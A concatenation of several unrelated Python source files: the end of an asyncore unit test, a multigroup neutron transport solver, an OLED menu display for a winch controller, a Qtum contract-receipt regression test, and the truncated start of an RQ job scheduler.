asyncore.close_all()
finally:
testmap, asyncore.socket_map = asyncore.socket_map, socketmap
else:
asyncore.close_all(testmap)
self.assertEqual(len(testmap), 0)
for c in l:
self.assertEqual(c.socket.closed, True)
def test_compact_traceback(self):
try:
raise Exception("I don't like spam!")
except:
real_t, real_v, real_tb = sys.exc_info()
r = asyncore.compact_traceback()
else:
self.fail("Expected exception")
(f, function, line), t, v, info = r
self.assertEqual(os.path.split(f)[-1], 'test_asyncore.py')
self.assertEqual(function, 'test_compact_traceback')
self.assertEqual(t, real_t)
self.assertEqual(v, real_v)
self.assertEqual(info, '[%s|%s|%s]' % (f, function, line))
class DispatcherTests(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
asyncore.close_all()
def test_basic(self):
d = asyncore.dispatcher()
self.assertEqual(d.readable(), True)
self.assertEqual(d.writable(), True)
def test_repr(self):
d = asyncore.dispatcher()
self.assertEqual(repr(d), '<asyncore.dispatcher at %#x>' % id(d))
def test_log(self):
d = asyncore.dispatcher()
# capture output of dispatcher.log() (to stderr)
fp = StringIO()
stderr = sys.stderr
l1 = "Lovely spam! Wonderful spam!"
l2 = "I don't like spam!"
try:
sys.stderr = fp
d.log(l1)
d.log(l2)
finally:
sys.stderr = stderr
lines = fp.getvalue().splitlines()
self.assertEquals(lines, ['log: %s' % l1, 'log: %s' % l2])
def test_log_info(self):
d = asyncore.dispatcher()
# capture output of dispatcher.log_info() (to stdout via print)
fp = StringIO()
stdout = sys.stdout
l1 = "Have you got anything without spam?"
l2 = "Why can't she have egg bacon spam and sausage?"
l3 = "THAT'S got spam in it!"
try:
sys.stdout = fp
d.log_info(l1, 'EGGS')
d.log_info(l2)
d.log_info(l3, 'SPAM')
finally:
sys.stdout = stdout
lines = fp.getvalue().splitlines()
expected = ['EGGS: %s' % l1, 'info: %s' % l2, 'SPAM: %s' % l3]
self.assertEquals(lines, expected)
def test_unhandled(self):
d = asyncore.dispatcher()
d.ignore_log_types = ()
# capture output of dispatcher.log_info() (to stdout via print)
fp = StringIO()
stdout = sys.stdout
try:
sys.stdout = fp
d.handle_expt()
d.handle_read()
d.handle_write()
d.handle_connect()
d.handle_accept()
finally:
sys.stdout = stdout
lines = fp.getvalue().splitlines()
expected = ['warning: unhandled incoming priority event',
'warning: unhandled read event',
'warning: unhandled write event',
'warning: unhandled connect event',
'warning: unhandled accept event']
self.assertEquals(lines, expected)
def test_issue_8594(self):
d = asyncore.dispatcher(socket.socket())
# make sure the error message no longer refers to the socket
# object but the dispatcher instance instead
try:
d.foo
except AttributeError, err:
self.assertTrue('dispatcher instance' in str(err))
else:
self.fail("exception not raised")
# test cheap inheritance with the underlying socket
self.assertEqual(d.family, socket.AF_INET)
def test_strerror(self):
# refers to bug #8573
err = asyncore._strerror(errno.EPERM)
if hasattr(os, 'strerror'):
self.assertEqual(err, os.strerror(errno.EPERM))
err = asyncore._strerror(-1)
self.assertTrue("unknown error" in err.lower())
class dispatcherwithsend_noread(asyncore.dispatcher_with_send):
def readable(self):
return False
def handle_connect(self):
pass
class DispatcherWithSendTests(unittest.TestCase):
usepoll = False
def setUp(self):
pass
def tearDown(self):
asyncore.close_all()
def test_send(self):
self.evt = threading.Event()
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.settimeout(3)
self.port = test_support.bind_port(self.sock)
cap = StringIO()
args = (self.evt, cap, self.sock)
threading.Thread(target=capture_server, args=args).start()
# wait a little longer for the server to initialize (it sometimes
# refuses connections on slow machines without this wait)
time.sleep(0.2)
data = "Suppose there isn't a 16-ton weight?"
d = dispatcherwithsend_noread()
d.create_socket(socket.AF_INET, socket.SOCK_STREAM)
d.connect((HOST, self.port))
# give time for socket to connect
time.sleep(0.1)
d.send(data)
d.send(data)
d.send('\n')
n = 1000
while d.out_buffer and n > 0:
asyncore.poll()
n -= 1
self.evt.wait()
self.assertEqual(cap.getvalue(), data*2)
class DispatcherWithSendTests_UsePoll(DispatcherWithSendTests):
usepoll = True
if hasattr(asyncore, 'file_wrapper'):
class FileWrapperTest(unittest.TestCase):
def setUp(self):
self.d = "It's not dead, it's sleeping!"
file(TESTFN, 'w').write(self.d)
def tearDown(self):
unlink(TESTFN)
def test_recv(self):
fd = os.open(TESTFN, os.O_RDONLY)
w = asyncore.file_wrapper(fd)
os.close(fd)
self.assertNotEqual(w.fd, fd)
self.assertNotEqual(w.fileno(), fd)
self.assertEqual(w.recv(13), "It's not dead")
self.assertEqual(w.read(6), ", it's")
w.close()
self.assertRaises(OSError, w.read, 1)
def test_send(self):
d1 = "Come again?"
d2 = "I want to buy some cheese."
fd = os.open(TESTFN, os.O_WRONLY | os.O_APPEND)
w = asyncore.file_wrapper(fd)
os.close(fd)
w.write(d1)
w.send(d2)
w.close()
self.assertEqual(file(TESTFN).read(), self.d + d1 + d2)
def test_dispatcher(self):
fd = os.open(TESTFN, os.O_RDONLY)
data = []
class FileDispatcher(asyncore.file_dispatcher):
def handle_read(self):
data.append(self.recv(29))
s = FileDispatcher(fd)
os.close(fd)
asyncore.loop(timeout=0.01, use_poll=True, count=2)
self.assertEqual("".join(data), self.d)
def test_main():
tests = [HelperFunctionTests, DispatcherTests, DispatcherWithSendTests,
DispatcherWithSendTests_UsePoll]
if hasattr(asyncore, 'file_wrapper'):
tests.append(FileWrapperTest)
run_unittest(*tests)
if __name__ == "__main__":
test_main()
|
solver.py | # -*- coding: utf-8 -*-
"""
Created on Wed Nov 20 11:09:46 2019
@author: azmanrafee
"""
def sweepbyangle(energy_group,X0, XN, omega_j, Q_mp, Sigma_trans, omega_azim, NN, delx, sintheta_j,j, group_mp, angles, phi_j_mp, a, b, phi_mpp, on, active):
import math, numpy as np
phi_j=np.zeros((energy_group,len(angles),j),dtype='d')
phi_j_boun=np.zeros((2,len(angles),j),dtype='d')
phi=np.zeros(NN,dtype='d')
Q=np.zeros(np.shape(Sigma_trans),dtype='d')
while on.value:
if active.value:
phi*=0
Q[:]=np.asarray(Q_mp).reshape(np.shape(Sigma_trans))
group=group_mp.value
for angle in range(len(angles)):
position=0
reverse=False
while True:
for jj in range(j):
s=delx[position]/sintheta_j[jj]/math.cos(angles[angle])
del_phi=(phi_j[group,angle,jj]-(Q[group,position]/Sigma_trans[group,position]))*(1-math.exp(-s*Sigma_trans[group,position]))
phi[position]+=omega_j[jj]*omega_azim*del_phi/(s*Sigma_trans[group,position])
phi_j[group,angle,jj]-=del_phi
position+=(-1)**reverse
if position==NN:
reverse=True
position-=1
phi_j_boun[0,angle]=phi_j[group,angle]
phi_j[group,angle]*=X0
elif position==-1:
phi_j_boun[1,angle]=phi_j[group,angle]
phi_j[group,angle]*=XN
break
phi_mpp[:]=phi
phi_j_mp[a*2*j:b*2*j]=phi_j_boun.reshape(len(angles)*2*j)
active.value=False
"""
"""
def moc1Dmg():
import multiprocessing as mp
import math, numpy as np
from ctypes import c_bool
if __name__=='__main__':
from input import sigma_scatter,sigma_fis,sigma_trans,chi,nu,X,NX,x0,xn,azim_div,energy_group,cores
X0=x0
XN=xn
delx=np.array([])
N=sum(NX)
NN=N
for i in range(len(X)):
delx=np.append(delx,np.ones(NX[i])*X[i]/NX[i])
sintheta_j=np.array([0.166648,0.537707,0.932954])
omega_j=np.array([0.046233,0.283619,0.670148])*2
j=3
azim=np.arange(np.pi/azim_div,np.pi/2,2*np.pi/azim_div)
omega_azim=4*math.pi/azim_div
phi=np.ones((energy_group,N))
phi_last=phi.copy()
keff_last=1
Sigma_trans=np.ones((energy_group,N))
Sigma_scatter=np.ones((N,energy_group,energy_group))
Sigma_fis=np.ones((energy_group,N))
Chi=np.ones((energy_group,N))
Nu=np.ones((energy_group,N))
for i in range (N):
x=np.sum(delx[0:i])+(0.5*delx[i])
Sigma_trans[:,i]=sigma_trans(x)
Sigma_scatter[i]=sigma_scatter(x)
Sigma_fis[:,i]=sigma_fis(x)
Chi[:,i]=chi(x)
Nu[:,i]=nu(x)
q=np.ones((energy_group,N))
F_source=np.ones((energy_group,N))
S_source=np.ones((energy_group,N))
for i in range(N):
S_source[:,i]=np.dot(np.tril(Sigma_scatter[i],k=-1)+np.triu(Sigma_scatter[i],k=1),phi[:,i])
F_source[:,i]=np.sum(Nu[:,i]*Sigma_fis[:,i]*phi[:,i])*Chi[:,i]
f_source=F_source.copy()
q_ext=F_source+S_source
for i in range(N):
q[:,i]=q_ext[:,i]+(np.diagonal(Sigma_scatter[i])*phi[:,i])
q_last=q.copy()
Q=q/(4*math.pi)
iteration=0
group_mp=mp.RawValue('i')
Q_mp=mp.RawArray('d',np.size(Q))
Q_mp[:]=Q.reshape(np.size(Q))
Q=np.asarray(Q_mp).reshape(np.shape(Sigma_trans))
on=mp.RawValue(c_bool,True)
active=[]
angles=[]
angle_per_core=len(azim)/cores
range_list=[]
for i in range(cores+1):
a_b=round(i*angle_per_core)
range_list.append(a_b)
for core in range(cores):
active.append(mp.RawValue(c_bool,False))
for core in range(cores):
angles.append(azim[range_list[core]:range_list[core+1]])
phi_mp=[]
for core in range (cores):
phi_mp.append(mp.RawArray('d',N))
phi_j_mp=mp.RawArray('d',len(azim)*2*j)
phi_j_mp[:]=np.zeros(len(phi_j_mp))
phi_j_last=np.asarray(phi_j_mp[:])
phi_j=np.zeros((energy_group,len(angles[cores-1]),j),dtype='d')
phi_j_boun=np.zeros((2,len(angles[cores-1]),j),dtype='d')
process_list=[]
for core in range(cores-1):
t=mp.Process(target=sweepbyangle,args=(energy_group,X0,XN,omega_j,Q_mp,Sigma_trans,omega_azim,NN,delx,sintheta_j,j,group_mp,angles[core],phi_j_mp,range_list[core],range_list[core+1],phi_mp[core],on,active[core]))
t.start()
process_list.append(t)
while True:
iteration+=1
print(iteration)
for group in range(energy_group):
group_mp.value=group
while True:
Q_mp[:]=q.reshape(np.size(q))/(4*math.pi)
phi[group,:]=q[group,:]/Sigma_trans[group,:]
for core in range(cores-1):
active[core].value=True
for angle in range(len(angles[cores-1])):
position=0
reverse=False
while True:
for jj in range(j):
s=delx[position]/sintheta_j[jj]/math.cos(angles[cores-1][angle])
del_phi=(phi_j[group,angle,jj]-(Q[group,position]/Sigma_trans[group,position]))*(1-math.exp(-s*Sigma_trans[group,position]))
phi[group,position]+=omega_j[jj]*omega_azim*del_phi/(s*Sigma_trans[group,position])
phi_j[group,angle,jj]-=del_phi
position+=(-1)**reverse
if position==NN:
reverse=True
position-=1
phi_j_boun[0,angle]=phi_j[group,angle]
phi_j[group,angle]*=X0
elif position==-1:
phi_j_boun[1,angle]=phi_j[group,angle]
phi_j[group,angle]*=XN
break
phi_j_mp[range_list[cores-1]*2*j:range_list[cores]*2*j]=phi_j_boun.reshape(len(angles[cores-1])*2*j)
while np.sum(np.asarray(active)):
pass
for core in range(cores):
phi[group,:]+=phi_mp[core][:]
phi_mp[core][:]=np.zeros(N)
for i in range(N):
q[group,i]=q_ext[group,i]+(Sigma_scatter[i,group,group]*phi[group,i])
res=np.array([np.max(abs(phi_j_mp[:]-phi_j_last)/phi_j_mp),np.max(abs(phi[group,:]-phi_last[group,:])/phi[group,:])])
if np.max(res)<1e-8:
break
else:
phi_j_last=np.asarray(phi_j_mp[:])
phi_last[group,:]=phi[group,:].copy()
for i in range(N):
f_source[:,i]=np.sum(Nu[:,i]*Sigma_fis[:,i]*phi[:,i])*Chi[:,i]
keff=np.sum(f_source)*keff_last/np.sum(F_source)
print(keff)
keff_last=keff
q-=q_ext
F_source=f_source.copy()
for i in range(N):
S_source[:,i]=np.dot(np.tril(Sigma_scatter[i],-1)+np.triu(Sigma_scatter[i],1),phi[:,i])
q_ext=(F_source/keff)+S_source
q+=q_ext
convergence=np.max(abs((q-q_last))/q)
if convergence<1e-6:
break
else:
q_last=q.copy()
on.value=False
return phi
import time
initial_time=time.time()
phi=moc1Dmg()
print(time.time()-initial_time)
|
display.py | #!/usr/bin/env python3
# -*- coding: UTF-8 -*-
# OpneWinchPy : a library for controlling the Raspberry Pi's Winch
# Copyright (c) 2020 Mickael Gaillard <mick.gaillard@gmail.com>
from luma.core.render import canvas
from luma.core.sprite_system import framerate_regulator
from PIL import ImageFont
from abc import ABC, abstractmethod
from enum import Enum, unique
import sys
import threading
from openwinch.config import config
from openwinch.constantes import SPEED_UNIT, WINCH_DISTANCE
from openwinch.input import InputType
from openwinch.logger import logger
from openwinch.display_config import (ITEM_BACK,
COLOR_PRIM_FONT,
COLOR_PRIM_BACK,
COLOR_SELC_FONT,
COLOR_SELC_BACK,
FONT_TEXT,
FONT_ICON,
FONT_LOGO)
from openwinch.hardware_config import (LCD_HEIGHT, LCD_WIDTH, LCD_ADDR, LCD_FPS)
from openwinch.version import __version__
@unique
class GuiType(Enum):
DISABLE = 0
SH1106_I2C = 1
VGA = 100
CAPTURE = 101
class Gui(object):
cursor_pos = 1
view_pos = 0
__winch = None
__device = None
screen = None
# distance = 1
def __init__(self, winch):
if (config.GUI == GuiType.SH1106_I2C.name):
from luma.core.interface.serial import i2c
from luma.oled.device import sh1106
serial_interface = i2c(port=1, address=LCD_ADDR)
self.__device = sh1106(serial_interface, width=LCD_WIDTH, height=LCD_HEIGHT, rotate=0)
elif (config.GUI == GuiType.VGA.name):
from luma.emulator.device import pygame
self.__device = pygame(width=LCD_WIDTH, height=LCD_HEIGHT, rotate=0, mode='1', transform='scale2x', scale=2, frame_rate=60)
elif (config.GUI == GuiType.CAPTURE.name):
from luma.emulator.device import capture
self.__device = capture(width=LCD_WIDTH, height=LCD_HEIGHT, rotate=0, mode='1', transform='scale2x', scale=2, file_template="docs/images/screens/OpenWinch_{0:06}.png")
if (self.__device is not None):
self.__device.show()
self.__winch = winch
self.__font = ImageFont.truetype(FONT_TEXT, 8)
self.__regulator = framerate_regulator(fps=LCD_FPS)
self.screen = MainScreen(self)
def getWinch(self):
return self.__winch
def __drawBoot(self):
if (self.__device is not None):
with canvas(self.__device) as draw:
font_size = 20
name = "OpenWinch"
x = (LCD_WIDTH / 2) - (len(name) / 2 * font_size / 2)
xver = (LCD_WIDTH / 2) + (((len(name) / 2) - 1) * font_size / 2)
y = (LCD_HEIGHT / 2) - (font_size / 2)
yver = y + font_size
draw.text((x, y), name, fill=COLOR_PRIM_FONT, font=ImageFont.truetype(FONT_LOGO, font_size))
draw.text((xver, yver), __version__, fill=COLOR_PRIM_FONT, font=ImageFont.truetype(FONT_TEXT, 8))
def boot(self):
self.__drawBoot()
self.__display_draw_Loop = threading.Thread(target=self.__draw_loop, name="display", args=(), daemon=True)
self.__display_draw_Loop.start()
def display(self):
if (self.__device is not None):
with canvas(self.__device) as draw:
self.screen.display(draw)
def getPos(self):
return self.cursor_pos
def enter(self, key):
# Directional Common
if (InputType.RIGHT == key):
self.cursor_pos += 1
elif (InputType.LEFT == key):
self.cursor_pos -= 1
elif (InputType.ENTER == key):
self.screen.enter(self.cursor_pos)
# out bound fix
if (self.cursor_pos < 0):
if (self.screen.countItems() - 1 > 0):
self.cursor_pos = self.screen.countItems() - 1
else:
self.cursor_pos = 0
elif (self.cursor_pos > self.screen.countItems() - 1):
self.cursor_pos = 0
def statusBar(self, draw):
# Battery
battery_value = self.__winch.getBattery()
battery_symbol = "๏"
if (battery_value > 87.5):
battery_symbol = "๏"
elif (battery_value > 62.5):
battery_symbol = "๏"
elif (battery_value > 37.5):
battery_symbol = "๏"
elif (battery_value > 12.5):
battery_symbol = "๏"
battery_x = 2
draw.text((battery_x, 0), battery_symbol, fill=COLOR_PRIM_FONT, font=ImageFont.truetype(FONT_ICON, 8))
draw.text((battery_x + 15, 1), "%s%%" % battery_value, fill=COLOR_PRIM_FONT, font=self.__font)
# Wifi
wifi_x = 105
draw.text((wifi_x, 0), "๏", fill=COLOR_PRIM_FONT, font=ImageFont.truetype(FONT_ICON, 8))
draw.text((wifi_x + 7, 1), "%s " % self.__winch.getRemote(), fill=COLOR_PRIM_FONT, font=self.__font)
def createValue(self, draw, title, value):
draw.text((0, 0), title, fill=COLOR_PRIM_FONT, font=ImageFont.truetype(FONT_TEXT, 12))
draw.rectangle([0, 12, LCD_WIDTH, 12], fill="white", outline="white")
draw.text((2, 18), "%s" % value, fill=COLOR_PRIM_FONT, font=ImageFont.truetype(FONT_TEXT, 14))
y = 0.78 * LCD_HEIGHT
draw.rectangle([0, y, LCD_WIDTH, LCD_HEIGHT], fill="white", outline="white")
draw.text((0, 0.80 * LCD_HEIGHT), "exit to save...", fill="black", font=ImageFont.truetype(FONT_TEXT, 12))
def createMenuScroll(self, draw, items, selected_item=None):
font_size = 12
draw_cursor_pos = 0
draw_view_pos = 0
cursor_limit_screen = (LCD_HEIGHT / font_size) - 1
if (self.cursor_pos > cursor_limit_screen):
draw_view_pos = -((self.cursor_pos - cursor_limit_screen) * font_size)
for item in items:
text_color = COLOR_PRIM_FONT
y = draw_cursor_pos * font_size
if (self.cursor_pos == draw_cursor_pos):
text_color = "black"
draw.rectangle([0, draw_view_pos + y, LCD_WIDTH, draw_view_pos + y + font_size], fill="white", outline="white")
if (selected_item is not None and selected_item == item):
draw.text((LCD_WIDTH - font_size, draw_view_pos + y), "๏", fill=text_color, font=ImageFont.truetype(FONT_ICON, font_size - 2))
draw.text((1, draw_view_pos + y), item, fill=text_color, font=ImageFont.truetype(FONT_TEXT, font_size))
draw_cursor_pos += 1
def createMenuIcon(self, draw, items):
font_size = 12
btn_width = LCD_WIDTH / 3
btn_start = ((btn_width - font_size) / 2) + 1
btn_height = 0.78 * LCD_HEIGHT
draw_cursor_pos = 0
for item in items:
bgd = "white"
fnt = "black"
if (draw_cursor_pos == self.cursor_pos):
bgd = "black"
fnt = "white"
draw.rectangle([draw_cursor_pos * btn_width, btn_height, (draw_cursor_pos + 1) * btn_width, LCD_HEIGHT], fill=bgd, outline=fnt)
draw.text((btn_start + draw_cursor_pos * btn_width, 0.79 * LCD_HEIGHT), items[draw_cursor_pos], fill=fnt, font=ImageFont.truetype(FONT_ICON, font_size))
draw_cursor_pos += 1
def __draw_loop(self):
t = threading.currentThread()
if (config.GUI != GuiType.DISABLE.name and config.GUI != GuiType.CAPTURE.name):
while getattr(t, "do_run", True):
with self.__regulator:
if (self.__winch.getState().isBoot):
self.display()
else:
self.__drawBoot()
else:
self.extractScreen
def extractScreen(self):
# Capture mode for DOC
self.display()
# Stop Screen 003
self.enter(InputType.ENTER)
self.display()
# Play Screen
self.enter(InputType.ENTER)
# Menu Screen 004 & 005
self.enter(InputType.RIGHT)
self.display()
self.enter(InputType.ENTER)
self.display()
# Manual postition 006 & 007
self.enter(InputType.RIGHT)
self.display()
self.enter(InputType.ENTER)
self.display()
self.enter(InputType.ENTER)
# Security distance 008 & 009
self.enter(InputType.RIGHT)
self.enter(InputType.RIGHT)
self.display()
self.enter(InputType.ENTER)
self.display()
self.enter(InputType.ENTER)
# Mode Selector 010 & 011
self.enter(InputType.RIGHT)
self.enter(InputType.RIGHT)
self.enter(InputType.RIGHT)
self.display()
self.enter(InputType.ENTER)
self.display()
self.enter(InputType.RIGHT)
self.display()
self.enter(InputType.ENTER)
# Mode Velocity Start 012 & 013
self.enter(InputType.RIGHT)
self.enter(InputType.RIGHT)
self.enter(InputType.RIGHT)
self.enter(InputType.RIGHT)
self.display()
self.enter(InputType.ENTER)
self.display()
self.enter(InputType.ENTER)
# Mode Velocity Stop 014 & 015
self.enter(InputType.RIGHT)
self.enter(InputType.RIGHT)
self.enter(InputType.RIGHT)
self.enter(InputType.RIGHT)
self.enter(InputType.RIGHT)
self.display()
self.enter(InputType.ENTER)
self.display()
self.enter(InputType.ENTER)
class ScreenBase(ABC):
_gui = None
_winch = None
def __init__(self, gui):
self._gui = gui
self._gui.cursor_pos = 0
self._gui.view_pos = 0
self._winch = self._gui.getWinch()
@abstractmethod
def countItems(self) -> int:
pass
@abstractmethod
def display(self, draw):
pass
@abstractmethod
def enter(self, cursor_pos):
pass
class MainScreen(ScreenBase):
__ITEMS_IDLE = ["๏", "๏ญ", ""]
__ITEMS_RUNNING = ["๏", "๏ญ", ""]
__ITEMS_ERROR = ["๏ฑ", "๏ญ", "๏"]
__count = 1
def countItems(self) -> int:
return len(self.__ITEMS_IDLE)
def display(self, draw):
self.__count += 2
self.__inver = True
# Status bar
self._gui.statusBar(draw)
# Speed
speed_x = 54
draw.text((speed_x, 14), "%s" % self._winch.getSpeedTarget(), fill="white", font=ImageFont.truetype(FONT_TEXT, 35))
draw.text((speed_x + 40, 28), SPEED_UNIT, fill="white", font=ImageFont.truetype(FONT_TEXT, 15)) # Very good
# Distance
marg = 4
percent = 1 / WINCH_DISTANCE * self._winch.getDistance()
draw.rectangle([0 + marg, 11, ((LCD_WIDTH - marg) * percent), 14], fill="white", outline="white")
if (self._winch.getState().isStop):
self._gui.createMenuIcon(draw, self.__ITEMS_IDLE)
elif (self._winch.getState().isRun):
self._gui.createMenuIcon(draw, self.__ITEMS_RUNNING)
self.__animateDistance(draw)
else:
self._gui.createMenuIcon(draw, self.__ITEMS_ERROR)
def __animateDistance(self, draw):
cursor_size = 2
stepper = 10
if (self.__count >= stepper):
self.__count = 1
if(self.__count % stepper != 0):
for i in range(0, int(LCD_WIDTH / stepper), 1):
draw.rectangle([self.__count + (i * stepper), 11, (self.__count + (i * stepper)) + cursor_size, 14], fill="black", outline="black")
def enter(self, cursor_pos):
if (0 == cursor_pos):
if (self._winch.getState().isStop):
self._winch.start()
else:
self._winch.stop()
if (1 == cursor_pos):
self._gui.screen = MenuScreen(self._gui)
if (2 == cursor_pos):
pass
class MenuScreen(ScreenBase):
__ITEMS_MENU = [
ITEM_BACK,
"Manual position",
"Security distance",
"Mode selector",
"Velocity Start",
"Velocity Stop",
]
# __ITEMS = ["๏", "๏ท", "๏"]
def countItems(self) -> int:
return len(self.__ITEMS_MENU)
def display(self, draw):
self._gui.createMenuScroll(draw, self.__ITEMS_MENU)
def enter(self, cursor_pos):
if (0 == cursor_pos):
self._gui.screen = MainScreen(self._gui)
else:
if (1 == cursor_pos):
self._gui.screen = ManualPositionScreen(self._gui)
elif (2 == cursor_pos):
self._gui.screen = SecurityDistanceScreen(self._gui)
elif (3 == cursor_pos):
self._gui.screen = ModeSelectorScreen(self._gui)
elif (4 == cursor_pos):
self._gui.screen = VelocityStartScreen(self._gui)
elif (5 == cursor_pos):
self._gui.screen = VelocityStopScreen(self._gui)
class ManualPositionScreen(ScreenBase):
def __init__(self, gui):
super(ManualPositionScreen, self).__init__(gui)
# Load from item
self._gui.cursor_pos = sys.maxsize / 2
def countItems(self) -> int:
return sys.maxsize
def display(self, draw):
draw.text((1, 1), "Move with Right/Left button.", fill=COLOR_PRIM_FONT, font=ImageFont.truetype(FONT_TEXT, 12))
y = 0.78 * LCD_HEIGHT
draw.rectangle([0, y, LCD_WIDTH, LCD_HEIGHT], fill="white", outline="white")
draw.text((0, 0.80 * LCD_HEIGHT), "enter to exit.", fill="black", font=ImageFont.truetype(FONT_TEXT, 12))
def enter(self, cursor_pos):
self._gui.screen = MenuScreen(self._gui)
class SecurityDistanceScreen(ScreenBase):
TITLE = "Security distance"
value = 10
def __init__(self, gui):
super(SecurityDistanceScreen, self).__init__(gui)
# Load from item
self._gui.cursor_pos = self.value
def countItems(self) -> int:
return 255
def display(self, draw):
self._gui.createValue(draw, self.TITLE, self._gui.getPos())
def enter(self, cursor_pos):
# Save to item
self._gui.screen = MenuScreen(self._gui)
class ModeSelectorScreen(ScreenBase):
__TITLE = "Mode selector"
__ITEMS = [
ITEM_BACK,
"OneWay",
"TwoWay",
]
def __init__(self, gui):
super(ModeSelectorScreen, self).__init__(gui)
# Load from item
# self._gui.cursor_pos = 0
def countItems(self) -> int:
return len(self.__ITEMS)
def display(self, draw):
self._gui.createMenuScroll(draw, self.__ITEMS, "OneWay")
def enter(self, cursor_pos):
# Save to item
self._gui.screen = MenuScreen(self._gui)
class VelocityStartScreen(ScreenBase):
TITLE = "Velocity Start"
value = 10
def __init__(self, gui):
super(VelocityStartScreen, self).__init__(gui)
# Load from item
self._gui.cursor_pos = self.value
def countItems(self) -> int:
return 255
def display(self, draw):
self._gui.createValue(draw, self.TITLE, self._gui.getPos())
def enter(self, cursor_pos):
# Save to item
self._gui.screen = MenuScreen(self._gui)
class VelocityStopScreen(ScreenBase):
TITLE = "Velocity Stop"
value = 10
def __init__(self, gui):
super(VelocityStopScreen, self).__init__(gui)
# Load from item
self._gui.cursor_pos = self.value
def countItems(self) -> int:
return 255
def display(self, draw):
self._gui.createValue(draw, self.TITLE, self._gui.getPos())
def enter(self, cursor_pos):
# Save to item
self._gui.screen = MenuScreen(self._gui)
|
qtum_transaction_receipt_origin_contract_address.py | #!/usr/bin/env python3
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import *
from test_framework.script import *
from test_framework.mininode import *
from test_framework.address import *
import threading
def waitforlogs(node, contract_address):
logs = node.cli.waitforlogs(node.cli.getblockcount()-1, 1000, '{"addresses": ["'+contract_address+'"]}')
node.result = logs
class QtumTransactionReceiptOriginContractAddressTest(BitcoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 1
self.extra_args = [['-logevents', '-txindex']]
def skip_test_if_missing_module(self):
self.skip_if_no_wallet()
def run_test(self):
self.node = self.nodes[0]
self.nodes[0].generate(10 + COINBASE_MATURITY)
"""
pragma solidity ^0.5.2;
contract Test {
event TestEvent();
address private child;
function setChildContract(address childContractAddress) external {
child = childContractAddress;
}
function doEvent() external {
if(child == address(0x0)) {
emit TestEvent();
} else {
Test(child).doEvent();
}
}
function getChildAddress() public view returns(address) {
return child;
}
}
"""
"""
Function signatures:
afd67ce7: doEvent()
bcb1c3a9: getChildAddress()
f8d86e18: setChildContract(address)
"""
# Set up a chain of 10 contracts that reference their child contract. I.e. the tenth contract is the leaf
contracts = []
contract_bytecode = "608060405234801561001057600080fd5b506102b8806100206000396000f3fe608060405234801561001057600080fd5b506004361061005e576000357c010000000000000000000000000000000000000000000000000000000090048063afd67ce714610063578063bcb1c3a91461006d578063f8d86e18146100b7575b600080fd5b61006b6100fb565b005b610075610220565b604051808273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200191505060405180910390f35b6100f9600480360360208110156100cd57600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190505050610249565b005b600073ffffffffffffffffffffffffffffffffffffffff166000809054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161415610182577f24ec1d3ff24c2f6ff210738839dbc339cd45a5294d85c79361016243157aae7b60405160405180910390a161021e565b6000809054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663afd67ce76040518163ffffffff167c0100000000000000000000000000000000000000000000000000000000028152600401600060405180830381600087803b15801561020757600080fd5b5060325a03f115801561021957600080fd5b505050505b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b806000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055505056fea165627a7a723058203cf61a18e40f6e2bd01b2f7bd607c6e6aff032f12bd5e3eca68212d2e2c80dbf0029"
for i in range(10):
contracts.append(self.nodes[0].createcontract(contract_bytecode)['address'])
self.node.generate(1)
if len(contracts) > 1:
self.node.sendtocontract(contracts[-2], "f8d86e18" + (contracts[-1].zfill(64)), 0, 1000000)
self.node.generate(1)
# Run the doEvent function recursively starting at the root contract and make sure that no event entries is in the returndata for waitforlogs for the first 9 contracts
for contract_address in contracts[:-1]:
thread = threading.Thread(target=waitforlogs, args=(self.node, contract_address))
thread.start()
txid = self.node.sendtocontract(contracts[0], "afd67ce7", 0, 1000000)['txid']
self.node.generate(7)
thread.join()
receipt = self.node.gettransactionreceipt(txid)
assert_equal(receipt[0]['log'][0]['address'], contracts[-1])
assert_equal(len(self.node.result['entries']), 0)
# Do the same thing again but make sure that the event triggers for the "leaf" (10th) contract
thread = threading.Thread(target=waitforlogs, args=(self.node, contracts[-1]))
thread.start()
txid = self.node.sendtocontract(contracts[0], "afd67ce7", 0, 1000000)['txid']
self.node.generate(7)
thread.join()
receipt = self.node.gettransactionreceipt(txid)
assert_equal(receipt[0]['log'][0]['address'], contracts[-1])
assert_equal(len(self.node.result['entries']), 1)
if __name__ == '__main__':
QtumTransactionReceiptOriginContractAddressTest().main()
|
scheduler.py | import logging
import os
import signal
import time
import traceback
from datetime import datetime
from multiprocessing import Process
from redis import Redis, SSLConnection, UnixDomainSocketConnection
from .defaults import DEFAULT_LOGGING_DATE_FORMAT, DEFAULT_LOGGING_FORMAT
from .job import Job
from .logutils import setup_loghandlers
from .queue import Queue
from .registry import ScheduledJobRegistry
from .utils import current_timestamp, enum
SCHEDULER_KEY_TEMPLATE = 'rq:scheduler:%s'
SCHEDULER_LOCKING_KEY_TEMPLATE = 'rq:scheduler-lock:%s'
class RQScheduler(object):
# STARTED: scheduler has been started but sleeping
# WORKING: scheduler is in the midst of scheduling jobs
# STOPPED: scheduler is in stopped condition
Status = enum(
'SchedulerStatus',
STARTED='started',
WORKING='working',
STOPPED='stopped'
)
def __init__(self, queues, connection, interval=1, logging_level=logging.INFO,
date_format=DEFAULT_LOGGING_DATE_FORMAT,
log_format=DEFAULT_LOGGING_FORMAT):
self._queue_names = set(parse_names(queues))
self._acquired_locks = set()
self._scheduled_job_registries = []
self.lock_acquisition_time = None
# Copy the connection kwargs before mutating them in order to not change the arguments
# used by the current connection pool to create new connections
self._connection_kwargs = connection.connection_pool.connection_kwargs.copy()
# Redis does not accept parser_class argument which is sometimes present
# on connection_pool kwargs, for example when hiredis is used
self._connection_kwargs.pop('parser_class', None)
self._connection_class = connection.__class__ # client
connection_class = connection.connection_pool.connection_class
if issubclass(connection_class, SSLConnection):
self._connection_kwargs['ssl'] = True
